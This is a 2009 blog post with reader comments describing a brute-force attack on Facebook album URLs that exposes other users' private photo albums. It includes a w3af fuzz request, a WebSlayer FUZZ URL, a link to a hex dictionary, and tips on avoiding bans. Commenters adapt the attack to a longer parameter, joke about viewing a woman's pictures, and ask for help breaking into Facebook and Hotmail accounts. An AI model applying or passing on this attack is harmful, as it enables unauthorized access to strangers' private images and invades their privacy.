Facebook Hack – Access Any Users Photo Albums
- March 12th, 2009
- Posted in Featured
- Write comment or click if you like the post:
Dave from Security Ninja shows how you can easily bruteforce a certain parameter to allow access to any user’s Facebook photo album using Burp Suite. Here are the basics:
Access to albums in Facebook is controlled by three parameters of a URL, you can see them here:
http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c
aid=-3 (-3 for every public profile album)
id=0123456789 (Obtained by searching for the user and hovering over the add friend button)
l=? (all we know is its 5 characters from the 0123456789abcdef range)
Dave uses Burp Suite, but there are many ways you can go about it. I think a dictionary of possible values might be marginally faster (untested) so I’ll use that.
First is one of my favorite methods, w3af’s Fuzzy Requests and Clustered Response tools.
GET http://www.facebook.com/album.php?aid=-3&id=targetsid&l=$[l.strip() for l in file('fbhex.dic').readlines()]$ HTTP/1.0
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Here’s the dictionary (1.1MB, zipped), extract it to your w3af directory.
After the run is finished, run the Cluster tool and wait. The valid page should show up far away from the rest of them.
Another tool that could be used for this is Edge Security’s WebSlayer:
URL:
http://www.facebook.com/album.php?aid=-3&id=targetsid&l=FUZZ
Set it to ignore lines so you can find your valid request faster. Currently, the error page contains 71 lines, but this may be different for you. Just run the scan for a few seconds and look at the number of lines that each error page contains, then stop the scan, enter the number in the ignore lines box and start again.
Other useful features of WebSlayer are the ability to control the rate and set proxy options.
There are likely MANY other tools that you can use to accomplish this task, but these seem to be the simplest.
Good luck, and remember:
Check out Dave’s post for the Burp Suite method he uses to generate the needed parameter.
Hi there!
Thanks for the positive words. I like your approach using the cluster tool, I imagine any tool that could automate requests would be fine to use here.
I wonder if there is a speed benefit to using a specific tool?
I also like your gtfo image, if it wasn’t for the fact my original presentation was aimed at a professional audience I would have gone and found a lovely lady to have been my test user
Dave
Sometimes I pride myself in being the filter between the pros and the kiddies… and sometimes not
I didn’t really go through with the full scan for fear of being banned (and a lack of a good proxy), but it seemed to me that WebSlayer combined with the dictionary provided much faster results than w3af, though w3af is kind of shoehorned into working on windows whereas WebSlayer seems to be native across the board. Results may be better with something like psycho added to w3af running on a processor specific Linux compile.
Your dictionary file is an invalid zip archive…
Where are you guys finding the slowness in w3af? In the clustering, or in the HTTP request sending?
@as
Sorry about that, should be fine now.
@Andres
HTTP requests seem to be about half the speed of WebSlayer and Clustering is slow because it’s processing over 1 million requests
Great, another nosy Parker!!!
your zip files can’t download
fixed again… i hate wordpress sometimes
thanks
It seems Facebook now uses a 10-char width for the l=? parameter.. Is there an updated dictionary out there by any wild chance?
And nukeit, as your mention of a lack of a good proxy, would you recommend against trying this out without one? Do you really think they’ll ban users for seeking out legitimate links?
Ha, that’s what I figured. It would be like 16^10 right?
Hi Yeck79,
I did post a follow up on my blog with regards to the change in the l= parameter (http://securityninja.co.uk/blog/?p=228). Basically Facebook took the old l= parameter and added 5 digits on the end.
In short, if you exploited the flaw previously (i.e. you know the old l= number) you can run the same attack to brute force the new 5 digits. Its not that likely but hey, if you ran out when I first published it and found the profile of a lovely lady and still want to access those pictures…….
Have fun!
SN
Good article. I’m not such FB fan but it might get handy.
Hi im looking to get into a facebook and hotmail account. can anyone help?
wow, how lazy of them…
Did u get any reply?
Hey, I was testing this method in websalyer, but when y tried to usea a payload that now has a width of 10 , in a permutation and y put the charset like 0123456789abcdef, the program does not create a temporal generator,(and instead it takes minutes to perform nothing), that we need in order to create a payload, i thought that maybe its for the width of the permutation, because I tried with a width of 5 and it just worked fine, but as you know FB now uses 10 chars in the “l” parameter, so i wanna ask somedy that uses web slayer if you know the reason of this problem, or maybe a way to solve it . thanks…and nukeit, thanks for the initial knowledge
I’ve just about given up on webslayer support. I don’t think the devs are around anymore, and the fact that they never released source kinda makes me worried about the safety of their binaries.
Hi There
i am not able to view any one’s photo album, if some can help me out to do so, is it possible to read photo comments also…Please help me..i need it on urgent basis
John
Now every facebook pic has a link address (pid number), and also an image address:
http://profile.ak.facebook.com/v222/267/42/nXXXXXXXXX_4215.jpg
I know of a person whose profile wasn’t private so I know the image address of her profile pic, then she made it all private so that now it doesn’t show up even in the search, but the old profile pic still opens.
With Webslayer, you can find the photo or album part by forcing the pid or aid numbers. But with the image address, I don’t know how exactly to proceed ,there are so many numbers involved. Has anyone ever done this before, or does anyone know what all those numbers are?
Have a look at theharmonyguy’s bookmarklet:
halooooooooooooooo
The dictionary would be huge… and would take over a month if you were running it from the server itself